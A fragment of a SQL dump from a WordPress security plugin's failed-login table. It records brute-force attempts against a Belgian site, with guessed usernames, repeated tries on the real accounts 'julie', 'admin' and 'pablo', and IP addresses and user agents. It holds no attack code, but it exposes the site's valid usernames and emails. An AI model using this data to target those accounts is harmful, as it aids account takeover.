(100034, 1494184749.463442, 1, 'loginFailInvalidUsername', 'DEMO', 0, 1578617924, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100035, 1494184792.539922, 1, 'loginFailInvalidUsername', 'webadmin', 0, 2727364316, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100036, 1494184828.271319, 1, 'loginFailInvalidUsername', 'wpadmin', 0, 3069127338, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100037, 1494186058.662050, 1, 'loginFailInvalidUsername', 'demo', 0, 3056763559, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100038, 1494186073.295562, 1, 'loginFailInvalidUsername', 'wordpress', 0, 3098029701, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100039, 1494188238.472523, 1, 'loginFailValidUsername', 'julie', 2, 3307252610, 'Mozilla/5.0 (Windows NT 5.1; WOW64; x64) AppleWebKit/532.82.44 (KHTML, like Gecko) Chrome/57.4.9356.4628 Safari/534.52 OPR/44.5.1179.6441'),
(100040, 1494194434.261028, 1, 'loginFailValidUsername', 'julie', 2, 3321294843, 'Mozilla/5.0 (Windows NT 5.1; WOW64; x64) AppleWebKit/531.75.12 (KHTML, like Gecko) Chrome/55.1.6460.1198 Safari/532.05 OPR/42.0.4647.9375'),
(100041, 1494203478.804859, 1, 'loginFailInvalidUsername', 'superadmin', 0, 1833311020, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100042, 1494203485.619958, 1, 'loginFailInvalidUsername', 'wpadmin', 0, 2746000698, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100043, 1494203508.048955, 1, 'loginFailInvalidUsername', 'manager', 0, 3423600883, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100044, 1494203540.366643, 1, 'loginFailInvalidUsername', 'blog', 0, 3098024843, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100045, 1494203699.293524, 1, 'loginFailInvalidUsername', 'webadmin', 0, 2111103174, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100046, 1494204311.809761, 1, 'loginFailInvalidUsername', 'superadmin', 0, 762746819, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100047, 1494204322.763654, 1, 'loginFailInvalidUsername', 'wpadmin', 0, 3527006264, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100048, 1494204458.009382, 1, 'loginFailInvalidUsername', 'blog', 0, 3164982411, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100049, 1494207259.856253, 1, 'loginFailValidUsername', 'julie', 2, 831573078, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_43_96) AppleWebKit/533.92.55 (KHTML, like Gecko) Chrome/57.5.0497.6769 Safari/530.63 Edge/34.68478'),
(100050, 1494213890.773217, 1, 'loginFailValidUsername', 'julie', 2, 2631829816, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/535.14.61 (KHTML, like Gecko) Chrome/53.6.1285.5913 Safari/534.54'),
(100051, 1494220451.515729, 1, 'loginFailValidUsername', 'julie', 2, 457123785, 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_58_01) AppleWebKit/534.07.60 (KHTML, like Gecko) Chrome/53.6.1825.7197 Safari/530.77 Edge/34.73756'),
(100052, 1494221825.770326, 1, 'loginFailValidUsername', 'julie', 2, 3059525007, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100053, 1494223268.085177, 1, 'loginFailInvalidUsername', 'webmaster', 0, 1833311020, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100054, 1494223286.843064, 1, 'loginFailInvalidUsername', 'administrador', 0, 1833311020, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100055, 1494223339.014519, 1, 'loginFailInvalidUsername', 'blog', 0, 762746819, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100056, 1494223342.730490, 1, 'loginFailInvalidUsername', 'demo', 0, 1833311020, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100057, 1494223417.682787, 1, 'loginFailInvalidUsername', 'webadmin', 0, 521678460, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100058, 1494223472.180278, 1, 'loginFailInvalidUsername', 'wpadmin', 0, 1743622318, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100059, 1494224217.620854, 1, 'loginFailInvalidUsername', 'webmaster', 0, 1578617924, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100060, 1494224241.519623, 1, 'loginFailInvalidUsername', 'administrador', 0, 762746819, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100061, 1494233048.809167, 1, 'loginFailValidUsername', 'julie', 2, 1001802451, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/535.11.68 (KHTML, like Gecko) Chrome/53.6.0072.5700 Safari/534.51'),
(100062, 1494244436.876548, 1, 'loginFailValidUsername', 'julie', 2, 736122260, 'Mozilla/5.0 (Windows NT 5.2; WOW64; x64) AppleWebKit/532.98.41 (KHTML, like Gecko) Chrome/57.5.0045.5317 Safari/534.59 OPR/40.6.1868.6130'),
(100063, 1494250430.950477, 1, 'loginFailValidUsername', 'julie', 2, 1402847781, 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:52.54.07) Gecko/20166103 Firefox/52.54.07'),
(100064, 1494256321.712703, 1, 'loginFailValidUsername', 'julie', 2, 2630546576, 'Mozilla/5.0 (Windows NT 6.3) AppleWebKit/534.05.52 (KHTML, like Gecko) Chrome/57.4.9341.4079 Safari/534.34'),
(100065, 1494262050.451385, 1, 'loginFailValidUsername', 'julie', 2, 2631563820, 'Mozilla/5.0 (Windows NT 5.0) AppleWebKit/533.03.56 (KHTML, like Gecko) Version/5.5.0 Safari/532.10'),
(100066, 1494267747.386054, 1, 'loginFailValidUsername', 'julie', 2, 2987835433, 'Mozilla/5.0 (Windows NT 5.1; WOW64; x64) AppleWebKit/532.83.36 (KHTML, like Gecko) Chrome/56.4.9528.4891 Safari/534.54 OPR/44.5.0341.5613'),
(100067, 1494273429.093639, 1, 'loginFailValidUsername', 'julie', 2, 781607262, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_29_77) AppleWebKit/530.61.18 (KHTML, like Gecko) Chrome/55.1.5953.0680 Safari/532.00'),
(100068, 1494275333.276593, 1, 'loginFailValidUsername', 'julie', 2, 96794361, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100069, 1494275333.927779, 1, 'loginFailValidUsername', 'julie', 2, 96794361, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100070, 1494275334.587700, 1, 'loginFailInvalidUsername', 'julie pierrard', 0, 96794361, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100071, 1494275335.237436, 1, 'loginFailValidUsername', 'pablo', 3, 96794361, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100072, 1494275335.879949, 1, 'loginFailValidUsername', 'admin', 1, 96794361, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100073, 1494291560.175931, 1, 'loginFailValidUsername', 'julie', 2, 3190654548, 'Mozilla/5.0 (Windows NT 6.2; WOW64; x64) AppleWebKit/530.66.13 (KHTML, like Gecko) Chrome/55.0.5436.0264 Safari/532.06 OPR/41.9.4713.9441'),
(100074, 1494298029.411056, 1, 'loginFailValidUsername', 'julie', 2, 3243069014, 'Mozilla/5.0 (Windows NT 5.1; WOW64; x64) AppleWebKit/531.74.21 (KHTML, like Gecko) Chrome/55.1.6285.1912 Safari/532.03 OPR/42.0.5462.9190'),
(100075, 1494304480.785613, 1, 'loginFailValidUsername', 'julie', 2, 1610003583, 'Mozilla/5.0 (Windows NT 5.1; WOW64; x64) AppleWebKit/531.73.20 (KHTML, like Gecko) Chrome/56.1.6147.1875 Safari/532.12 OPR/42.0.5335.0063'),
(100076, 1494310133.818797, 1, 'loginFailValidUsername', 'admin', 1, 736163900, 'XML-RPC.NET'),
(100077, 1494310936.218019, 1, 'loginFailValidUsername', 'julie', 2, 3411101549, 'Mozilla/5.0 (Windows NT 6.0; rv:45.64.01) Gecko/20152151 Firefox/45.64.01'),
(100078, 1494317156.488803, 1, 'loginFailValidUsername', 'julie', 2, 528523110, 'Mozilla/5.0 (Windows NT 5.2) AppleWebKit/533.96.49 (KHTML, like Gecko) Chrome/57.5.0846.5118 Safari/530.67 OPR/40.6.2569.7831'),
(100079, 1494324707.225711, 1, 'loginFailValidUsername', 'admin', 1, 1743082501, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100080, 1494329170.220379, 1, 'loginFailValidUsername', 'julie', 2, 1489603430, 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_58_01) AppleWebKit/534.16.69 (KHTML, like Gecko) Chrome/53.6.1806.7178 Safari/530.77 Edge/34.83572'),
(100081, 1494335196.319019, 1, 'loginFailValidUsername', 'julie', 2, 736614910, 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/535.13.76 (KHTML, like Gecko) Version/4.7.2 Safari/533.31'),
(100082, 1494341198.178507, 1, 'loginFailValidUsername', 'julie', 2, 3159064624, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_25_88; rv:45.76.29) Gecko/20131478 Firefox/45.76.29'),
(100083, 1494343641.217313, 1, 'loginFailInvalidUsername', 'notre', 0, 2917982362, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100084, 1494343643.115287, 1, 'loginFailInvalidUsername', 'pour', 0, 2917982362, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100085, 1494343644.985104, 1, 'loginFailInvalidUsername', 'cross', 0, 2917982362, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100086, 1494343646.908742, 1, 'loginFailInvalidUsername', 'objectifs', 0, 2917982362, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100087, 1494343649.042228, 1, 'loginFailInvalidUsername', 'venez', 0, 2917982362, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100088, 1494343650.898066, 1, 'loginFailInvalidUsername', 'outils', 0, 2917982362, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1');
INSERT INTO `wp_wfLogins` (`id`, `ctime`, `fail`, `action`, `username`, `userID`, `IP`, `UA`) VALUES
(100089, 1494343652.854581, 1, 'loginFailInvalidUsername', 'professionnel', 0, 2917982362, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100090, 1494343654.828309, 1, 'loginFailInvalidUsername', 'travail', 0, 2917982362, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100091, 1494343657.673368, 1, 'loginFailInvalidUsername', 'namur', 0, 2917982362, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100092, 1494343659.706190, 1, 'loginFailInvalidUsername', 'center', 0, 2917982362, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100093, 1494344413.478876, 1, 'loginFailInvalidUsername', 'test', 0, 3590043250, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100094, 1494344829.131689, 1, 'loginFailInvalidUsername', 'user', 0, 3497117403, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100095, 1494344830.953201, 1, 'loginFailInvalidUsername', 'user', 0, 3497117403, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100096, 1494344832.763122, 1, 'loginFailInvalidUsername', 'user', 0, 3497117403, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100097, 1494344834.599632, 1, 'loginFailInvalidUsername', 'user', 0, 3497117403, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100098, 1494344836.445443, 1, 'loginFailInvalidUsername', 'user', 0, 3497117403, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100099, 1494344838.347988, 1, 'loginFailInvalidUsername', 'user', 0, 3497117403, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100100, 1494344840.195090, 1, 'loginFailValidUsername', 'admin', 1, 3497117403, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100101, 1494344842.028954, 1, 'loginFailValidUsername', 'admin', 1, 3497117403, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100102, 1494344843.859600, 1, 'loginFailValidUsername', 'julie', 2, 3497117403, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100103, 1494344845.898923, 1, 'loginFailValidUsername', 'pablo', 3, 3497117403, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100104, 1494345339.842912, 1, 'loginFailInvalidUsername', 'vous', 0, 1299175467, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100105, 1494347044.128576, 1, 'loginFailValidUsername', 'julie', 2, 3183178439, 'Mozilla/5.0 (Windows NT 6.2; WOW64; x64) AppleWebKit/530.66.13 (KHTML, like Gecko) Chrome/55.1.5516.0244 Safari/532.06 OPR/42.9.4794.9422'),
(100106, 1494352811.132894, 1, 'loginFailValidUsername', 'julie', 2, 657107382, 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/534.17.60 (KHTML, like Gecko) Version/4.7.2 Safari/533.34'),
(100107, 1494358577.932459, 1, 'loginFailValidUsername', 'julie', 2, 1742133325, 'Mozilla/5.0 (Windows NT 6.2; WOW64; x64) AppleWebKit/530.63.10 (KHTML, like Gecko) Chrome/55.0.5127.0855 Safari/532.02 OPR/41.9.4404.9132'),
(100108, 1494364417.351143, 1, 'loginFailValidUsername', 'julie', 2, 2979827550, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/536.36.89 (KHTML, like Gecko) Chrome/54.8.4837.9109 Safari/531.97'),
(100109, 1494376423.065829, 1, 'loginFailValidUsername', 'julie', 2, 2001428387, 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:52.69.12) Gecko/20161628 Firefox/52.69.12'),
(100110, 1494381206.595518, 1, 'loginFailValidUsername', 'julie', 2, 3004848413, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_31_84) AppleWebKit/532.90.43 (KHTML, like Gecko) Chrome/57.5.0283.5555 Safari/534.51 Edge/34.67344'),
(100111, 1494387678.942648, 1, 'loginFailValidUsername', 'julie', 2, 1934610389, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/535.18.65 (KHTML, like Gecko) Chrome/53.6.0648.5376 Safari/534.57'),
(100112, 1494394076.643271, 1, 'loginFailValidUsername', 'julie', 2, 1389492631, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/536.38.81 (KHTML, like Gecko) Chrome/54.8.4090.9363 Safari/531.99'),
(100113, 1494406468.533725, 1, 'loginFailValidUsername', 'julie', 2, 3058309450, 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_55_08) AppleWebKit/534.04.57 (KHTML, like Gecko) Chrome/53.6.1611.6983 Safari/530.75 Edge/34.71626'),
(100114, 1494418422.204496, 1, 'loginFailValidUsername', 'julie', 2, 3075668780, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_36_88) AppleWebKit/532.94.47 (KHTML, like Gecko) Chrome/57.4.9601.5973 Safari/534.55'),
(100115, 1494424332.222221, 1, 'loginFailValidUsername', 'julie', 2, 453246710, 'Mozilla/5.0 (Windows NT 6.2; WOW64; x64) AppleWebKit/531.60.18 (KHTML, like Gecko) Chrome/55.1.5972.0600 Safari/532.00 OPR/42.9.4169.9897'),
(100116, 1494430204.331461, 1, 'loginFailValidUsername', 'julie', 2, 1744766542, 'Mozilla/5.0 (Windows NT 6.2; WOW64; x64) AppleWebKit/530.67.14 (KHTML, like Gecko) Chrome/55.1.5677.0305 Safari/532.07 OPR/41.9.4855.9583'),
(100117, 1494435792.059045, 1, 'loginFailValidUsername', 'julie', 2, 1768589606, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/535.17.64 (KHTML, like Gecko) Chrome/53.5.0672.5300 Safari/534.47'),
(100118, 1494439952.522844, 1, 'loginFailValidUsername', 'julie', 2, 3190256054, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/534.13.66 (KHTML, like Gecko) Version/4.7.2 Safari/533.21'),
(100119, 1494445481.624401, 1, 'loginFailValidUsername', 'julie', 2, 1410741964, 'Mozilla/5.0 (Windows NT 5.0) AppleWebKit/533.08.51 (KHTML, like Gecko) Version/5.6.1 Safari/532.15'),
(100120, 1494449630.290643, 1, 'loginFailValidUsername', 'julie', 2, 1469388680, 'Mozilla/5.0 (Windows NT 5.1; WOW64; x64) AppleWebKit/531.74.21 (KHTML, like Gecko) Chrome/56.2.6224.1952 Safari/532.13 OPR/42.0.5501.0239'),
(100121, 1494453790.049272, 1, 'loginFailValidUsername', 'julie', 2, 2323001623, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/535.29.82 (KHTML, like Gecko) Chrome/54.8.3185.8457 Safari/531.90'),
(100122, 1494458200.523648, 1, 'loginFailValidUsername', 'julie', 2, 3308264343, 'Mozilla/5.0 (Windows NT 6.2; Win64) AppleWebKit/530.63.00 (KHTML, like Gecko) Chrome/55.0.5131.0869 Safari/531.93 OPR/41.9.3418.8146'),
(100123, 1494462514.811885, 1, 'loginFailValidUsername', 'julie', 2, 1892208309, 'Mozilla/5.0 (Windows NT 5.2; WOW64; x64) AppleWebKit/532.84.31 (KHTML, like Gecko) Version/5.2.7 Safari/530.76'),
(100124, 1494467001.981335, 1, 'loginFailValidUsername', 'julie', 2, 609118280, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_28_81) AppleWebKit/532.87.30 (KHTML, like Gecko) Chrome/57.4.9922.4294 Safari/534.58'),
(100125, 1494471511.262246, 1, 'loginFailValidUsername', 'julie', 2, 2107873451, 'Mozilla/5.0 (Windows NT 6.0; rv:45.66.03) Gecko/20155056 Firefox/45.66.03'),
(100126, 1494472932.299568, 1, 'loginFailValidUsername', 'admin', 1, 1389487932, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100127, 1494476036.342306, 1, 'loginFailValidUsername', 'julie', 2, 3211855785, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_48_91) AppleWebKit/533.07.50 (KHTML, like Gecko) Chrome/57.5.0904.6276 Safari/530.67 Edge/34.73549'),
(100128, 1494480556.931328, 1, 'loginFailValidUsername', 'julie', 2, 2588180238, 'Mozilla/5.0 (Windows NT 5.2; WOW64; x64) AppleWebKit/531.79.26 (KHTML, like Gecko) Chrome/56.2.6802.1530 Safari/532.19 OPR/42.0.5089.0717'),
(100129, 1494491133.608045, 1, 'loginFailValidUsername', 'julie', 2, 2996213217, 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:52.55.18) Gecko/20167850 Firefox/52.55.18'),
(100130, 1494497128.816834, 1, 'loginFailValidUsername', 'julie', 2, 696935125, 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:45.64.17) Gecko/20176812 Firefox/45.64.17'),
(100131, 1494503072.101910, 1, 'loginFailValidUsername', 'julie', 2, 1744766316, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/535.22.85 (KHTML, like Gecko) Chrome/54.8.3311.8683 Safari/531.92'),
(100132, 1494508951.619215, 1, 'loginFailValidUsername', 'julie', 2, 2081250832, 'Mozilla/5.0 (Windows NT 5.2; WOW64; x64) AppleWebKit/532.80.27 (KHTML, like Gecko) Chrome/56.2.7823.1550 Safari/532.19 OPR/42.1.5100.0838'),
(100133, 1494514787.949353, 1, 'loginFailValidUsername', 'julie', 2, 1347203962, 'Mozilla/5.0 (Windows NT 5.0) AppleWebKit/532.86.33 (KHTML, like Gecko) Version/5.3.8 Safari/530.79'),
(100134, 1494519754.579324, 1, 'loginFailInvalidUsername', 'namur', 0, 1009505852, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100135, 1494519766.544185, 1, 'loginFailInvalidUsername', 'center', 0, 1009505852, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100136, 1494519772.854971, 1, 'loginFailValidUsername', 'admin', 1, 1009505852, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100137, 1494519780.273676, 1, 'loginFailValidUsername', 'julie', 2, 1009505852, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100138, 1494519791.297207, 1, 'loginFailValidUsername', 'pablo', 3, 1009505852, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100139, 1494519802.256258, 1, 'loginFailInvalidUsername', 'vous', 0, 1009505852, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100140, 1494519811.497959, 1, 'loginFailInvalidUsername', 'training', 0, 1009505852, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100141, 1494519817.354555, 1, 'loginFailInvalidUsername', 'notre', 0, 1009505852, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100142, 1494519822.463162, 1, 'loginFailInvalidUsername', 'pour', 0, 1009505852, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100143, 1494519826.764700, 1, 'loginFailInvalidUsername', 'cross', 0, 1009505852, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100144, 1494520585.950960, 1, 'loginFailInvalidUsername', 'objectifs', 0, 1743847615, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100145, 1494520601.831770, 1, 'loginFailValidUsername', 'julie', 2, 3195175839, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.70.23) Gecko/20172282 Firefox/45.70.23'),
(100146, 1494521117.313936, 1, 'loginFailInvalidUsername', 'info@crosstrainingcenter.be', 0, 2513063543, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100147, 1494521597.170272, 1, 'loginFailInvalidUsername', 'info@crosstrainingcenter.be', 0, 1570692602, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100148, 1494522195.241519, 1, 'loginFailInvalidUsername', 'webmaster', 0, 2575217096, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100149, 1494522199.496904, 1, 'loginFailInvalidUsername', 'webmaster', 0, 2575217096, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100150, 1494522201.771087, 1, 'loginFailInvalidUsername', 'webmaster', 0, 2575217096, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100151, 1494522204.329105, 1, 'loginFailInvalidUsername', 'webmaster', 0, 2575217096, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100152, 1494522206.822933, 1, 'loginFailInvalidUsername', 'webmaster', 0, 2575217096, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100153, 1494522209.394825, 1, 'loginFailInvalidUsername', 'webmaster', 0, 2575217096, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100154, 1494522211.949903, 1, 'loginFailInvalidUsername', 'webmaster', 0, 2575217096, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100155, 1494522214.265599, 1, 'loginFailInvalidUsername', 'testuser', 0, 2575217096, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100156, 1494522216.518553, 1, 'loginFailInvalidUsername', 'test@crosstrainingcenter.be', 0, 2575217096, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100157, 1494522218.827426, 1, 'loginFailInvalidUsername', 'test', 0, 2575217096, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100158, 1494522689.696564, 1, 'loginFailValidUsername', 'admin', 1, 2901752882, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100159, 1494523099.923597, 1, 'loginFailInvalidUsername', 'outils', 0, 1572433768, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100160, 1494526262.022203, 1, 'loginFailValidUsername', 'julie', 2, 789310186, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_48_91) AppleWebKit/533.07.50 (KHTML, like Gecko) Chrome/57.5.1963.6235 Safari/530.68 Edge/34.74146'),
(100161, 1494537660.701063, 1, 'loginFailValidUsername', 'julie', 2, 2630488184, 'Mozilla/5.0 (Windows NT 5.2; WOW64; x64) AppleWebKit/532.80.27 (KHTML, like Gecko) Version/5.2.7 Safari/530.63'),
(100162, 1494543641.651066, 1, 'loginFailValidUsername', 'julie', 2, 3065626300, 'Mozilla/5.0 (Windows NT 5.1; WOW64; x64) AppleWebKit/531.79.26 (KHTML, like Gecko) Chrome/56.1.6784.1411 Safari/532.18 OPR/42.0.5061.0799'),
(103121, 1499367518.260714, 1, 'loginFailInvalidUsername', 'test', 0, 531691445, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103122, 1499367589.292903, 1, 'loginFailInvalidUsername', 'test', 0, 623913265, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
